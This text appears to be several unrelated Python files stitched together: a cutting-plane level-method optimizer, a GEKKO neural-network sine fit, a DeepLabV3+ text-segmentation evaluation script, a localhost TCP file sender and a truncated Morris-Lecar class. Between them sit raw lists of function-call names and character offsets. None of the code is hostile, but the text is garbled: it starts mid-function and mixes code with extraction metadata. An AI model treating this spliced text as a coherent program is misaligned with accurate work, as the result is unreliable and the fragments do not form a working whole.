A_ub_x, A_ub_y, b_ub = self.get_constraints()
objective = cvxpy.quad_form(x, P) + q.T @ x
constraints = []
constraints.append(A_ub_x @ x + A_ub_y * y <= b_ub)
constraints.append(y == level)
prob = cvxpy.Problem(cvxpy.Minimize(objective), constraints)
prob.solve(verbose=verbose, max_iter=10**7, time_limit=5)
#print("Solution = ", x.value, y.value)
if np.abs(level-y.value) > max_distance_error:
print("Warning, projection error above threshold: ", np.abs(level-y.value))
return x.value
def plot(self, points=[], temp_points=[]):
plt.figure()
xaxis = np.linspace(-self.bounds, self.bounds, num=100)
yaxis = np.linspace(-self.bounds, self.bounds, num=100)
result = np.zeros((len(xaxis),len(yaxis)))
for i, x in enumerate(xaxis):
for j, y in enumerate(yaxis):
result[j,i], _ = self.__call__([x,y])
c = plt.contour(xaxis, yaxis, result, 50)
plt.colorbar()
for p in temp_points:
plt.plot(p[0], p[1], 'o', color='red');
for i, p in enumerate(points):
plt.plot(p[0], p[1], 'o', color='black');
plt.text(p[0], p[1], str(i))
plt.show()
class LevelMethod2d:
def __init__(self, bounds=10, lambda_=0.29289, epsilon=0.001, max_iter=1000):
self.bounds = bounds
self.lambda_ = lambda_
self.epsilon = epsilon
self.max_iter = 1000
self.function = None
self.dim = None
self.function_points = None
self.current_iter = None
# Algorithm data
self.f_upstar = None
self.f_substar = None
self.x_upstar = None
self.x_substar = None
self.x = None
def cache_points(self, xaxis=None, yaxis=None):# Todo, for x of dim n
if xaxis is None:
xaxis = np.linspace(-self.bounds, self.bounds, num=100)
if yaxis is None:
yaxis = np.linspace(-self.bounds, self.bounds, num=100)
result = np.zeros((len(xaxis),len(yaxis)))
for i, x in enumerate(xaxis):
for j, y in enumerate(yaxis):
result[j,i], _ = self.function([x,y])
self.function_points = result
def plot(self, points=[], temp_points=[]):
plt.figure()
xaxis = np.linspace(-self.bounds, self.bounds, num=100)
yaxis = np.linspace(-self.bounds, self.bounds, num=100)
if self.function_points is None:
self.cache_points(xaxis, yaxis)
c = plt.contour(xaxis, yaxis, self.function_points, 50)
plt.colorbar()
for p in temp_points:
plt.plot(p[0], p[1], 'o', color='red');
for i, p in enumerate(points):
plt.plot(p[0], p[1], 'o', color='black');
plt.text(p[0], p[1], str(i))
plt.show()
def solve(self, function, x, verbose=False, plot=False):
self.function = function
self.dim = len(x)
self.x = x
# Build the cutting plane model
self.model = CuttingPlaneModel(self.dim, self.bounds)
plot_points = [x]
self.f_upstar = math.inf
self.x_upstar = None
gap = math.inf
self.current_iter = 0
print(f"Iteration\tf*\t\tModel Min\t\tGap\t\tLevel\t Is on boder?")
while gap > self.epsilon:
# Oracle computes f and g
current_f, current_g = function(self.x)
# Update model
self.model.add_plane(current_f, current_g, self.x)
# Compute f_substar, f_upstar, x_upstar
self.x_substar, self.f_substar, is_on_border = self.model.solve(-self.bounds,self.bounds)
if self.f_upstar > current_f:
self.f_upstar = current_f
self.x_upstar = self.x
# Project x onto level set
gap = self.f_upstar - self.f_substar
level = self.f_substar + self.lambda_ * gap
if gap < -0.1:
print("Warning: Negative gap ", gap)
break
if is_on_border: # Project x on the border, as target level is infinite.
self.x = self.x_substar
else: # Project x on the target level
self.x = self.model.project_point(self.x, level, verbose=verbose)
print(f"{self.current_iter}\t\t{self.f_upstar:.6f}\t{self.f_substar:.6f}\t\t{gap:.6f}\t{level:.6f} {is_on_border}")
if plot:
plot_points.append(self.x)
self.model.plot(plot_points)
self.plot(plot_points)
self.current_iter += 1
if self.current_iter > self.max_iter:
print("Warning: Maximum number of iterations reached.")
break
if __name__ == "__main__":
from test_function import TestFunction
f = LevelMethod2d(bounds = 20)
f.solve(TestFunction(), [-1,-3], plot=False)
| [
"numpy.abs",
"numpy.eye",
"numpy.multiply",
"numpy.hstack",
"matplotlib.pyplot.colorbar",
"numpy.asarray",
"matplotlib.pyplot.plot",
"numpy.max",
"numpy.append",
"matplotlib.pyplot.contour",
"matplotlib.pyplot.figure",
"numpy.linspace",
"numpy.empty",
"test_function.TestFunction",
"matpl... | [((261, 283), 'numpy.empty', 'np.empty', (['(0, dim + 1)'], {}), '((0, dim + 1))\n', (269, 283), True, 'import numpy as np\n'), ((501, 554), 'numpy.asarray', 'np.asarray', (['[[c[1], c[2]] for c in self.coefficients]'], {}), '([[c[1], c[2]] for c in self.coefficients])\n', (511, 554), True, 'import numpy as np\n'), ((646, 694), 'numpy.asarray', 'np.asarray', (['[(-c[0]) for c in self.coefficients]'], {}), '([(-c[0]) for c in self.coefficients])\n', (656, 694), True, 'import numpy as np\n'), ((825, 840), 'numpy.append', 'np.append', (['c', 'g'], {}), '(c, g)\n', (834, 840), True, 'import numpy as np\n'), ((868, 917), 'numpy.append', 'np.append', (['self.coefficients', '[new_plane]'], {'axis': '(0)'}), '(self.coefficients, [new_plane], axis=0)\n', (877, 917), True, 'import numpy as np\n'), ((2142, 2151), 'numpy.eye', 'np.eye', (['n'], {}), '(n)\n', (2148, 2151), True, 'import numpy as np\n'), ((2164, 2183), 'numpy.multiply', 'np.multiply', (['x0', '(-2)'], {}), '(x0, -2)\n', (2175, 2183), True, 'import numpy as np\n'), ((2884, 2896), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2894, 2896), True, 'import matplotlib.pyplot as plt\n'), ((2914, 2961), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (2925, 2961), True, 'import numpy as np\n'), ((2978, 3025), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (2989, 3025), True, 'import numpy as np\n'), ((3226, 3263), 'matplotlib.pyplot.contour', 'plt.contour', (['xaxis', 'yaxis', 'result', '(50)'], {}), '(xaxis, yaxis, result, 50)\n', (3237, 3263), True, 'import matplotlib.pyplot as plt\n'), ((3272, 3286), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (3284, 3286), True, 'import matplotlib.pyplot as plt\n'), ((3513, 3523), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3521, 3523), True, 'import matplotlib.pyplot as plt\n'), ((4585, 4597), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4595, 4597), True, 'import matplotlib.pyplot as plt\n'), ((4619, 4666), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4630, 4666), True, 'import numpy as np\n'), ((4687, 4734), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4698, 4734), True, 'import numpy as np\n'), ((4846, 4897), 'matplotlib.pyplot.contour', 'plt.contour', (['xaxis', 'yaxis', 'self.function_points', '(50)'], {}), '(xaxis, yaxis, self.function_points, 50)\n', (4857, 4897), True, 'import matplotlib.pyplot as plt\n'), ((4910, 4924), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (4922, 4924), True, 'import matplotlib.pyplot as plt\n'), ((5175, 5185), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5183, 5185), True, 'import matplotlib.pyplot as plt\n'), ((7238, 7252), 'test_function.TestFunction', 'TestFunction', ([], {}), '()\n', (7250, 7252), False, 'from test_function import TestFunction\n'), ((439, 448), 'numpy.max', 'np.max', (['y'], {}), '(y)\n', (445, 448), True, 'import numpy as np\n'), ((2673, 2696), 'numpy.abs', 'np.abs', (['(level - y.value)'], {}), '(level - y.value)\n', (2679, 2696), True, 'import numpy as np\n'), ((3330, 3368), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""red"""'}), "(p[0], p[1], 'o', color='red')\n", (3338, 3368), True, 'import matplotlib.pyplot as plt\n'), ((3421, 3461), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""black"""'}), "(p[0], p[1], 'o', color='black')\n", (3429, 3461), True, 'import matplotlib.pyplot as plt\n'), ((4158, 4205), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4169, 4205), True, 'import numpy as np\n'), ((4252, 4299), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4263, 4299), True, 'import numpy as np\n'), ((4976, 5014), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""red"""'}), "(p[0], p[1], 'o', color='red')\n", (4984, 5014), True, 'import matplotlib.pyplot as plt\n'), ((5075, 5115), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""black"""'}), "(p[0], p[1], 'o', color='black')\n", (5083, 5115), True, 'import matplotlib.pyplot as plt\n'), ((787, 804), 'numpy.multiply', 'np.multiply', (['g', 'x'], {}), '(g, x)\n', (798, 804), True, 'import numpy as np\n'), ((2782, 2805), 'numpy.abs', 'np.abs', (['(level - y.value)'], {}), '(level - y.value)\n', (2788, 2805), True, 'import numpy as np\n'), ((364, 381), 'numpy.hstack', 'np.hstack', (['(1, x)'], {}), '((1, x))\n', (373, 381), True, 'import numpy as np\n')] |
from gekko import GEKKO
import numpy as np
import matplotlib.pyplot as plt
# generate training data
x = np.linspace(0.0,2*np.pi,20)
y = np.sin(x)
# option for fitting function
select = True # True / False
if select:
# Size with cosine function
nin = 1 # inputs
n1 = 1 # hidden layer 1 (linear)
n2 = 1 # hidden layer 2 (nonlinear)
n3 = 1 # hidden layer 3 (linear)
nout = 1 # outputs
else:
# Size with hyperbolic tangent function
nin = 1 # inputs
n1 = 2 # hidden layer 1 (linear)
n2 = 2 # hidden layer 2 (nonlinear)
n3 = 2 # hidden layer 3 (linear)
nout = 1 # outputs
# Initialize gekko
train = GEKKO()
test = GEKKO()
model = [train,test]
for m in model:
# input(s)
m.inpt = m.Param()
# layer 1
m.w1 = m.Array(m.FV, (nin,n1))
m.l1 = [m.Intermediate(m.w1[0,i]*m.inpt) for i in range(n1)]
# layer 2
m.w2a = m.Array(m.FV, (n1,n2))
m.w2b = m.Array(m.FV, (n1,n2))
if select:
m.l2 = [m.Intermediate(sum([m.cos(m.w2a[j,i]+m.w2b[j,i]*m.l1[j]) \
for j in range(n1)])) for i in range(n2)]
else:
m.l2 = [m.Intermediate(sum([m.tanh(m.w2a[j,i]+m.w2b[j,i]*m.l1[j]) \
for j in range(n1)])) for i in range(n2)]
# layer 3
m.w3 = m.Array(m.FV, (n2,n3))
m.l3 = [m.Intermediate(sum([m.w3[j,i]*m.l2[j] \
for j in range(n2)])) for i in range(n3)]
# output(s)
m.outpt = m.CV()
m.Equation(m.outpt==sum([m.l3[i] for i in range(n3)]))
# flatten matrices
m.w1 = m.w1.flatten()
m.w2a = m.w2a.flatten()
m.w2b = m.w2b.flatten()
m.w3 = m.w3.flatten()
# Fit parameter weights
m = train
m.inpt.value=x
m.outpt.value=y
m.outpt.FSTATUS = 1
for i in range(len(m.w1)):
m.w1[i].FSTATUS=1
m.w1[i].STATUS=1
m.w1[i].MEAS=1.0
for i in range(len(m.w2a)):
m.w2a[i].STATUS=1
m.w2b[i].STATUS=1
m.w2a[i].FSTATUS=1
m.w2b[i].FSTATUS=1
m.w2a[i].MEAS=1.0
m.w2b[i].MEAS=0.5
for i in range(len(m.w3)):
m.w3[i].FSTATUS=1
m.w3[i].STATUS=1
m.w3[i].MEAS=1.0
m.options.IMODE = 2
m.options.SOLVER = 3
m.options.EV_TYPE = 2
m.solve(disp=False)
# Test sample points
m = test
for i in range(len(m.w1)):
m.w1[i].MEAS=train.w1[i].NEWVAL
m.w1[i].FSTATUS = 1
print('w1['+str(i)+']: '+str(m.w1[i].MEAS))
for i in range(len(m.w2a)):
m.w2a[i].MEAS=train.w2a[i].NEWVAL
m.w2b[i].MEAS=train.w2b[i].NEWVAL
m.w2a[i].FSTATUS = 1
m.w2b[i].FSTATUS = 1
print('w2a['+str(i)+']: '+str(m.w2a[i].MEAS))
print('w2b['+str(i)+']: '+str(m.w2b[i].MEAS))
for i in range(len(m.w3)):
m.w3[i].MEAS=train.w3[i].NEWVAL
m.w3[i].FSTATUS = 1
print('w3['+str(i)+']: '+str(m.w3[i].MEAS))
m.inpt.value=np.linspace(-2*np.pi,4*np.pi,100)
m.options.IMODE = 2
m.options.SOLVER = 3
m.solve(disp=False)
plt.figure()
plt.plot(x,y,'bo',label='data')
plt.plot(test.inpt.value,test.outpt.value,'r-',label='predict')
plt.legend(loc='best')
plt.ylabel('y')
plt.xlabel('x')
plt.show() | [
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"gekko.GEKKO",
"numpy.linspace",
"matplotlib.pyplot.figure",
"numpy.sin",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((107, 138), 'numpy.linspace', 'np.linspace', (['(0.0)', '(2 * np.pi)', '(20)'], {}), '(0.0, 2 * np.pi, 20)\n', (118, 138), True, 'import numpy as np\n'), ((139, 148), 'numpy.sin', 'np.sin', (['x'], {}), '(x)\n', (145, 148), True, 'import numpy as np\n'), ((660, 667), 'gekko.GEKKO', 'GEKKO', ([], {}), '()\n', (665, 667), False, 'from gekko import GEKKO\n'), ((676, 683), 'gekko.GEKKO', 'GEKKO', ([], {}), '()\n', (681, 683), False, 'from gekko import GEKKO\n'), ((2750, 2789), 'numpy.linspace', 'np.linspace', (['(-2 * np.pi)', '(4 * np.pi)', '(100)'], {}), '(-2 * np.pi, 4 * np.pi, 100)\n', (2761, 2789), True, 'import numpy as np\n'), ((2846, 2858), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2856, 2858), True, 'import matplotlib.pyplot as plt\n'), ((2859, 2893), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""bo"""'], {'label': '"""data"""'}), "(x, y, 'bo', label='data')\n", (2867, 2893), True, 'import matplotlib.pyplot as plt\n'), ((2891, 2957), 'matplotlib.pyplot.plot', 'plt.plot', (['test.inpt.value', 'test.outpt.value', '"""r-"""'], {'label': '"""predict"""'}), "(test.inpt.value, test.outpt.value, 'r-', label='predict')\n", (2899, 2957), True, 'import matplotlib.pyplot as plt\n'), ((2955, 2977), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (2965, 2977), True, 'import matplotlib.pyplot as plt\n'), ((2978, 2993), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""y"""'], {}), "('y')\n", (2988, 2993), True, 'import matplotlib.pyplot as plt\n'), ((2994, 3009), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""x"""'], {}), "('x')\n", (3004, 3009), True, 'import matplotlib.pyplot as plt\n'), ((3010, 3020), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3018, 3020), True, 'import matplotlib.pyplot as plt\n')] |
import argparse
import os
import sys
import numpy as np
import pdb
from tqdm import tqdm
import cv2
import glob
import numpy as np
from numpy import *
import matplotlib
#matplotlib.use("Agg")
#matplotlib.use("wx")
#matplotlib.use('tkagg')
import matplotlib.pyplot as plt
import scipy
from scipy.special import softmax
import torch
from torch.utils.data import DataLoader
from torch.utils.data import Dataset
import torch.nn as nn
from modeling.sync_batchnorm.replicate import patch_replication_callback
from modeling.deeplab import *
from PIL import Image
# class load_data(Dataset):
# def __init__(self,args,img_path):
# super().__init__()
# self.args = args
# self.img_path = img_path
# def __getitem__(self,img_path):
# image = Image.open(self.img_path).convert('RGB')
# image = np.array(image).astype(np.float32).transpose((2, 0, 1))
# image = torch.from_numpy(image).float()
# return image
def get_model(nclass,args):
model = DeepLab(num_classes=nclass,
backbone=args.backbone,
output_stride=args.out_stride,
sync_bn=args.sync_bn,
freeze_bn=args.freeze_bn)
# Using cuda
if args.cuda:
model = torch.nn.DataParallel(model, device_ids=args.gpu_ids)
patch_replication_callback(model)
model = model.cuda()
checkpoint = torch.load(args.resume)
if args.cuda:
model.module.load_state_dict(checkpoint['state_dict'])
else:
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
return model
def get_pred(img_path,model,args):
model.eval()
image = Image.open(img_path).convert('RGB')
#image = image.resize((512,512), Image.ANTIALIAS)
image = np.array(image).astype(np.float32).transpose((2, 0, 1))
image = np.expand_dims(image, axis=0)
image = torch.from_numpy(image).float()
if args.cuda:
image = image.cuda()
with torch.no_grad():
output = model(image)
#pdb.set_trace()
# normalize = nn.Softmax(dim=1)
# output = normalize(output)
pred = output.data.cpu().numpy()
return pred
def F1_loss(pred,target):
N = np.logical_or(pred,target) # logical
Tp = np.logical_and(pred,target)
Fn = np.subtract(target,Tp) # element-wise subtraction in pytorch
#Fn = np.bitwise_xor(target,Tp)
Fp = np.subtract(pred,Tp)
Tn = np.subtract(N,np.logical_or(Tp,Fp,Fn))
#pdb.set_trace()
precision = np.sum(Tp)/(np.sum(Tp)+np.sum(Fp))
recall = np.sum(Tp)/(np.sum(Tp)+np.sum(Fn))
F1 = (2*np.sum(Tp))/(2*np.sum(Tp)+np.sum(Fn)+np.sum(Fp))
#F1 = np.true_divide(np.add(2*Tp,Fn,Fp),2*Tp)
#F1 = np.true_divide(np.sum(np.multiply(2,Tp),Fn,Fp),np.multiply(2,Tp))
#F1 = np.true_divide(np.multiply(2,Tp),np.multiply(np.sum(Tp,Fn),np.sum(Tp,Fn)))
#accuracy = np.true_divide(np.add(Tp,Tn),np.add(Tp,Tn,Fp,Fn))
accuracy = np.sum(Tp+Tn)/np.sum(N)
return F1 , accuracy, precision, recall
def F1_rwi(pred,target):
#pred = pred[:,:,0] # using only the red channel
#target = target[:,:,0]
N = np.logical_or(pred, target) # logical
Tp = np.logical_and(pred, target)
Fn = np.bitwise_xor(target, Tp) # element-wise subtraction in pytorch
Fp = np.bitwise_xor(pred, Tp)
xx= np.logical_or(np.logical_or(Tp,Fp), Fn)
Tn = np.bitwise_xor(N, xx)
precision = Tp.sum()/(Tp.sum()+ Fp.sum() )
recall = Tp.sum()/(Tp.sum()+ Fn.sum())
F1 = 2*Tp.sum() /(2*Tp.sum()+ Fn.sum()+ Fp.sum())
accuracy = (Tp.sum()+Tn.sum())/N.sum()
return F1, accuracy, precision, recall
if __name__=='__main__':
#### Parameters and paths:
nclass = 2
save_rrc_res_path = "/path/to/deepLabV3Plus/deeplabv3plus_pixelWise/results/validation_images/B_260/"
model_path = "/path/to/deepLabV3Plus/deeplabv3plus_pixelWise/results/icdar_models/run/icdar/deeplab-resnet/model_best.pth.tar"
alphabet="#abcdefghijklmnopqrstuvwxyz1234567890@"
img_path = "/path/to/GAN_text/data/text_segmentation/test/A/"
gt_path = "/path/to/GAN_text/data/text_segmentation/test/B_gt_1chanel/"
### args
parser = argparse.ArgumentParser(description="PyTorch DeeplabV3Plus Heatmap Prediction")
parser.add_argument('--backbone', type=str, default='resnet',
choices=['resnet', 'xception', 'drn', 'mobilenet'],
help='backbone name (default: resnet)')
parser.add_argument('--freeze-bn', type=bool, default=False,
help='whether to freeze bn parameters (default: False)')
parser.add_argument('--out-stride', type=int, default=16,
help='network output stride (default: 8)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--gpu-ids', type=str, default='0',
help='use which gpu to train, must be a \
comma-separated list of integers only (default=0)')
parser.add_argument('--sync-bn', type=bool, default=None,
help='whether to use sync bn (default: auto)')
##checking point
parser.add_argument('--resume', type=str, default= model_path,
help='put the path to resuming file if needed')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
try:
args.gpu_ids = [int(s) for s in args.gpu_ids.split(',')]
except ValueError:
raise ValueError('Argument --gpu_ids must be a comma-separated list of integers only')
if args.sync_bn is None:
if args.cuda and len(args.gpu_ids) > 1:
args.sync_bn = True
else:
args.sync_bn = False
image_files = sorted(glob.glob(img_path+'*.png')) #'*.jpg'))
trained_model = get_model(nclass,args)
f1_all = []
accuracy_all = []
f1_all_rwi = []
accuracy_all_rwi = []
#for img_path in sys.argv[1:]:
#for i in range(0,10):
for i in range(0,len(image_files)):
img_path = image_files[i]
print("image path is: {}".format(img_path))
img_name = img_path.split('/')[-1].split('.')[0]
gt = asarray(Image.open(gt_path+img_name+'.png'))
#trained_model = get_model(nclass,args)
#pdb.set_trace()
# load_test_data = load_data(args,img_path)
# dataloader = DataLoader(load_test_data)
# for ii, img_test in enumerate(dataloader):
pred = get_pred(img_path,trained_model,args)
pred = softmax(pred, axis=1)
#image_source = cv2.imread(img_path)
#image_source = cv2.resize(image_source, (512, 512))
#pdb.set_trace()
#fig = plt.figure()
# plt.imshow(pred.squeeze()[1,:,:])
# plt.show()
# res = pred.squeeze()[1,:,:]>0.3
#res = np.argmax(pred.squeeze(), axis=0)
#pdb.set_trace()
# plt.imshow(res)
# plt.show()
#ret,pred_bin = cv2.threshold(pred.squeeze()[1,:,:],0.2,255,cv2.THRESH_BINARY)
pred_bin = np.argmax(pred.squeeze(), axis=0)
#pdb.set_trace()
f1, acc, prc, rcl = F1_loss(pred_bin>5,gt>5)
print("F1 is {}, accuracy is {}, precision is {}, recall is {}".format(f1,acc,prc,rcl))
#pdb.set_trace()
pred_bin_8 = pred_bin.astype(np.uint8)
f1_rwi, acc_rwi, prc_rwi, rcl_rwi = F1_rwi(pred_bin_8>5,gt>5)
print("F1_rwi is {}, accuracy_rwi is {}, precision_rwi is {}, recall_rwi is {}".format(f1_rwi,acc_rwi,prc_rwi,rcl_rwi))
f1_all.append(f1)
accuracy_all.append(acc)
f1_all_rwi.append(f1_rwi)
accuracy_all_rwi.append(acc_rwi)
print("the average of F1 is {}".format(np.mean(f1_all)))
print("the average accuracy is {}".format(np.mean(accuracy_all)))
print("the average of F1_rwi is {}".format(np.mean(f1_all_rwi)))
print("the average accuracy_rwi is {}".format(np.mean(accuracy_all_rwi))) | [
"modeling.sync_batchnorm.replicate.patch_replication_callback",
"numpy.mean",
"PIL.Image.open",
"numpy.logical_and",
"argparse.ArgumentParser",
"torch.load",
"numpy.bitwise_xor",
"numpy.logical_or",
"numpy.subtract",
"torch.nn.DataParallel",
"torch.from_numpy",
"numpy.sum",
"numpy.array",
... | [((1440, 1463), 'torch.load', 'torch.load', (['args.resume'], {}), '(args.resume)\n', (1450, 1463), False, 'import torch\n'), ((1961, 1990), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1975, 1990), True, 'import numpy as np\n'), ((2333, 2360), 'numpy.logical_or', 'np.logical_or', (['pred', 'target'], {}), '(pred, target)\n', (2346, 2360), True, 'import numpy as np\n'), ((2380, 2408), 'numpy.logical_and', 'np.logical_and', (['pred', 'target'], {}), '(pred, target)\n', (2394, 2408), True, 'import numpy as np\n'), ((2417, 2440), 'numpy.subtract', 'np.subtract', (['target', 'Tp'], {}), '(target, Tp)\n', (2428, 2440), True, 'import numpy as np\n'), ((2524, 2545), 'numpy.subtract', 'np.subtract', (['pred', 'Tp'], {}), '(pred, Tp)\n', (2535, 2545), True, 'import numpy as np\n'), ((3258, 3285), 'numpy.logical_or', 'np.logical_or', (['pred', 'target'], {}), '(pred, target)\n', (3271, 3285), True, 'import numpy as np\n'), ((3305, 3333), 'numpy.logical_and', 'np.logical_and', (['pred', 'target'], {}), '(pred, target)\n', (3319, 3333), True, 'import numpy as np\n'), ((3343, 3369), 'numpy.bitwise_xor', 'np.bitwise_xor', (['target', 'Tp'], {}), '(target, Tp)\n', (3357, 3369), True, 'import numpy as np\n'), ((3417, 3441), 'numpy.bitwise_xor', 'np.bitwise_xor', (['pred', 'Tp'], {}), '(pred, Tp)\n', (3431, 3441), True, 'import numpy as np\n'), ((3499, 3520), 'numpy.bitwise_xor', 'np.bitwise_xor', (['N', 'xx'], {}), '(N, xx)\n', (3513, 3520), True, 'import numpy as np\n'), ((4288, 4367), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PyTorch DeeplabV3Plus Heatmap Prediction"""'}), "(description='PyTorch DeeplabV3Plus Heatmap Prediction')\n", (4311, 4367), False, 'import argparse\n'), ((1297, 1350), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {'device_ids': 'args.gpu_ids'}), '(model, device_ids=args.gpu_ids)\n', (1318, 1350), False, 'import torch\n'), ((1359, 1392), 'modeling.sync_batchnorm.replicate.patch_replication_callback', 'patch_replication_callback', (['model'], {}), '(model)\n', (1385, 1392), False, 'from modeling.sync_batchnorm.replicate import patch_replication_callback\n'), ((2092, 2107), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2105, 2107), False, 'import torch\n'), ((2573, 2598), 'numpy.logical_or', 'np.logical_or', (['Tp', 'Fp', 'Fn'], {}), '(Tp, Fp, Fn)\n', (2586, 2598), True, 'import numpy as np\n'), ((2636, 2646), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2642, 2646), True, 'import numpy as np\n'), ((2684, 2694), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2690, 2694), True, 'import numpy as np\n'), ((3073, 3088), 'numpy.sum', 'np.sum', (['(Tp + Tn)'], {}), '(Tp + Tn)\n', (3079, 3088), True, 'import numpy as np\n'), ((3087, 3096), 'numpy.sum', 'np.sum', (['N'], {}), '(N)\n', (3093, 3096), True, 'import numpy as np\n'), ((3464, 3485), 'numpy.logical_or', 'np.logical_or', (['Tp', 'Fp'], {}), '(Tp, Fp)\n', (3477, 3485), True, 'import numpy as np\n'), ((5542, 5567), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5565, 5567), False, 'import torch\n'), ((6002, 6031), 'glob.glob', 'glob.glob', (["(img_path + '*.png')"], {}), "(img_path + '*.png')\n", (6011, 6031), False, 'import glob\n'), ((6794, 6815), 'scipy.special.softmax', 'softmax', (['pred'], {'axis': '(1)'}), '(pred, axis=1)\n', (6801, 6815), False, 'from scipy.special import softmax\n'), ((1791, 1811), 'PIL.Image.open', 'Image.open', (['img_path'], {}), '(img_path)\n', (1801, 1811), False, 'from PIL import Image\n'), ((2003, 2026), 'torch.from_numpy', 'torch.from_numpy', (['image'], {}), '(image)\n', (2019, 2026), False, 'import torch\n'), ((2648, 2658), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2654, 2658), True, 'import numpy as np\n'), ((2659, 2669), 'numpy.sum', 'np.sum', (['Fp'], {}), '(Fp)\n', (2665, 2669), True, 'import numpy as np\n'), ((2696, 2706), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2702, 2706), True, 'import numpy as np\n'), ((2707, 2717), 'numpy.sum', 'np.sum', (['Fn'], {}), '(Fn)\n', (2713, 2717), True, 'import numpy as np\n'), ((2732, 2742), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2738, 2742), True, 'import numpy as np\n'), ((2769, 2779), 'numpy.sum', 'np.sum', (['Fp'], {}), '(Fp)\n', (2775, 2779), True, 'import numpy as np\n'), ((6442, 6481), 'PIL.Image.open', 'Image.open', (["(gt_path + img_name + '.png')"], {}), "(gt_path + img_name + '.png')\n", (6452, 6481), False, 'from PIL import Image\n'), ((7978, 7993), 'numpy.mean', 'np.mean', (['f1_all'], {}), '(f1_all)\n', (7985, 7993), True, 'import numpy as np\n'), ((8046, 8067), 'numpy.mean', 'np.mean', (['accuracy_all'], {}), '(accuracy_all)\n', (8053, 8067), True, 'import numpy as np\n'), ((8122, 8141), 'numpy.mean', 'np.mean', (['f1_all_rwi'], {}), '(f1_all_rwi)\n', (8129, 8141), True, 'import numpy as np\n'), ((8198, 8223), 'numpy.mean', 'np.mean', (['accuracy_all_rwi'], {}), '(accuracy_all_rwi)\n', (8205, 8223), True, 'import numpy as np\n'), ((2758, 2768), 'numpy.sum', 'np.sum', (['Fn'], {}), '(Fn)\n', (2764, 2768), True, 'import numpy as np\n'), ((1893, 1908), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (1901, 1908), True, 'import numpy as np\n'), ((2747, 2757), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2753, 2757), True, 'import numpy as np\n')] |
# import library socket karena menggunakan IPC socket
import socket
# definisikan IP untuk binding
TCP_IP = '127.0.0.1'
# definisikan port untuk binding
TCP_PORT = 5005
# definisikan ukuran buffer untuk menerima pesan
BUFFER_SIZE = 4096
# buat socket (bertipe UDP atau TCP?)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# lakukan binding ke IP dan port
s.bind((TCP_IP, TCP_PORT))
# lakukan listen
s.listen(1)
# siap menerima koneksi
conn, addr = s.accept()
print ('Connection address:', addr)
# buka file bernama "file_didownload.txt
# masih hard code, file harus ada dalam folder yang sama dengan script python
f = open("download.txt", "rb")
try:
# baca file tersebut sebesar buffer
byte = f.read(BUFFER_SIZE)
# selama tidak END OF FILE; pada pyhton EOF adalah b''
while byte != b'':
# kirim hasil pembacaan file dari server ke client
conn.send(byte)
# baca sisa file hingga EOF
byte = f.read(BUFFER_SIZE)
finally:
print ("end sending")
# tutup file jika semua file telah dibaca
f.close()
# tutup socket
s.close()
# tutup koneksi
conn.close()
| [
"socket.socket"
] | [((285, 334), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (298, 334), False, 'import socket\n')] |
import numpy as np
from scipy.integrate import odeint
class MorrisLecar:
"""
Creates a MorrisLecar model.
